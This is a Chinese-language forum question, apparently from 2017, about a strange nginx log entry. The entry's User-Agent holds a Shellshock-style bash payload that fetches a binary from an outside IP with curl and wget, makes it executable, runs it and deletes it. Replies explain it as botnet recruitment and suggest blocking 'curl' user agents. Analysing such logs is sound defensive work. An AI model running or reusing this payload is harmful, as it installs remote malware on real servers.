简体中文(ZH-CN)English(EN)繁体中文(ZH-TW)日本語(JA)한국어(KO)Melayu(MS)Français(FR)Deutsch(DE)
首頁
文章
問答
課程
專題
下載
遊戲
詞典
最近更新

首頁  >  問答  >  主體

nginx - 關於使用user-agent進行攻擊的問題

今天無意中發現公司伺服器的nginx的access.log中有一條日誌很奇特:

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

比較奇怪的地方時:

  1. 使用的是http1.0

  2. user-agent是一段腳本

網路上搜了一圈,並沒有找到關於使用user-agent進行攻擊的資料,我雖然能順著日誌中的位址拿到腳本程式碼,但自己能力有限,無法分析出它的攻擊目標是什麼。

請問各位大牛,有相關的資料和經驗麼?不妨和我分享一下,感激不盡! !

補充:

在nginx的什麼設定情況下,會去解析user-agent裡的內容呢?

世界只因有你世界只因有你2714 天前625

全部回覆(3)我來回復

  • 阿神

    阿神2017-05-16 17:12:16

    這個應該是http1.0user-agent漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS攻击,但是我不知道nginx會不會執行它這個腳本

    你可以看看你access.loghttp://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/a 你可以看看這個程式碼。

    回覆
    0
  • 滿天的星座

    滿天的星座2017-05-16 17:12:16

    掃描器注入的。 。 。都會解析User-Agent的。
    1、裝應用防火牆
    2、設定Nginx

    `
    if ($http_user_agent ~* 'curl') #配置被拒絕的 user_agent。
    {
    return 403;
    }
    `

    回覆
    0
  • 过去多啦不再A梦

    过去多啦不再A梦2017-05-16 17:12:16

    一段 perl 脚本,作用就是 伪装成 Apache

    然後接受指令做一些事情。 。 。沒錯,就是抓肉雞。

    回覆
    0
  • 取消回覆